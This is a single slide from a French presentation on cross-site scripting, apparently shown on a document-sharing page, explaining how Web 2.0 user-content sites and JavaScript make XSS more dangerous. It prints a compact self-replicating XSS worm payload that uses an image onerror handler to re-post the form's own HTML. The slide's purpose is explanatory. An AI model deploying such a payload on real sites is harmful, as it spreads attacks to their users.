X hits on this document

93 views

0 shares

0 downloads

0 comments

19 / 46

XSS – de la brise à l'ouragan – II) Chute violente du baromètre - les catalyseurs b) Vive le WEB 2.0 !!

Les données du problème :

Dans son acception « utilisateurs », le WEB 2.0 se caractérise :

  • -

    par la multiplication d'espaces permettant de récupérer et d'afficher des

données utilisateurs ;

  • -

    l'extension considérable des possibilités offertes par le javascript (cf.

XHR).

Beaucoup de services en ligne sont aujourd'hui massivement utilisés (cf. Facebook, MySpace, services Google... Mais aussi demain plus modestement les ENT dans l'Education Nationale).

Un code javascript peut s'auto-reproduire : (vers XSS)

<form><input name="content"><img src="" onerror="with(parentNode)alert('XSS',submit(content.val ue='<form>'+innerHTML.slice(action=(method='post') +'.php',155)))">

Document info
Document views93
Page views102
Page last viewedSun Dec 04 06:22:48 UTC 2016
Pages46
Paragraphs417
Words3787

Comments